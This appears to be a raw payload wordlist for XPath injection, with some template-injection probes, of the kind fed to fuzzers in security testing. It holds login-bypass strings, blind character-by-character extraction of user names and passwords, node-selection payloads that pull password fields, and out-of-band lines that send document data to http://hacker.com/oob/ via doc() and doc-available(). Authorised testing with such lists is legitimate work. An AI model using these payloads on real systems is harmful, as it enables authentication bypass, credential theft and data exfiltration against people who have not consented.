" or ""="
" or "1"="1
$
%
&apos;XoiZR
&lt;% Tnn96 %&gt;
&lt;%= Tnn96 %&gt;
&lt;? Tnn96 ?&gt;
&lt;?Tnn96 ?&gt;
&lt;Tnn96&gt;
&quot;XoiZR
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
' or "a" or '
' or ''='
' or '1'='1
' or /* or '
' or 1 or '
' or 1]%00
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''='
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''='
' or true() or '
') or 1=1 or ('
') or 1=1] | //user/password[('')=('
') or 2=1] | //user/node()[('')=('
')] | //./node()[('')=('
')] | //node()[('')=('
')] | //password%00
')] | //user/*[1] | a[('
')] | //user/*[2] | a[('
')] | //user/*[3] | a[('
')] | //user/*[4] | a[('
')]/../*[3][text()!=('
'or contains(.,'adm') or'
'or contains(name,'adm') or'
'or position()=2 or'
'or string-length(name(.))<10 or'
(Tnn96)
*
*/*
+
-
-1
/
//
//*
//name
//name/child::node()
//name/node()
//user/child::node()
//user/name
//user/node()
//user[last()-1]/name #mark
//user[position()=1]/child::node()[position()=2]
//user[position()=1]/name
/user/name
:
;
@
@*
admin' or '
admin' or '1'='2
and count(/*) = 1 
and count(/*[1]/*) = 2 
and count(/*[1]/*[1]/*) = 1 
and count(/*[1]/*[1]/*[1]/*) = 0 
and count(/*[1]/*[2]/*) = 3
and count(/*[1]/*[2]/*[1]/*) = 0
and count(/*[1]/*[2]/*[2]/*) = 0
and count(/*[1]/*[2]/*[3]/*) = 1
and count(/*[1]/*[2]/*[3]/[1]*) = 0
and name(/*[1]) = "root" 
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105
and substring(name(/*[1]/*[1]),1,1) = "a" 
count(//user/node())
count(/child::node())
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
false
name
null
search=')] | //user/*[contains(*,'
search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
string-length(//user[position()=1]/child::node()[position()=1])
substrig(//user[position()=2/child::node()[position()=1],2,1)
substring(//user[userid=5]/username,2,1)="a"
true
user//name
user/name
x' or 1=1 or 'x'='y
x' or name()='username' or 'x'='y
[Tnn96]
{= Tnn96}
{Tnn96}
{{= Tnn96}}
{{Tnn96}}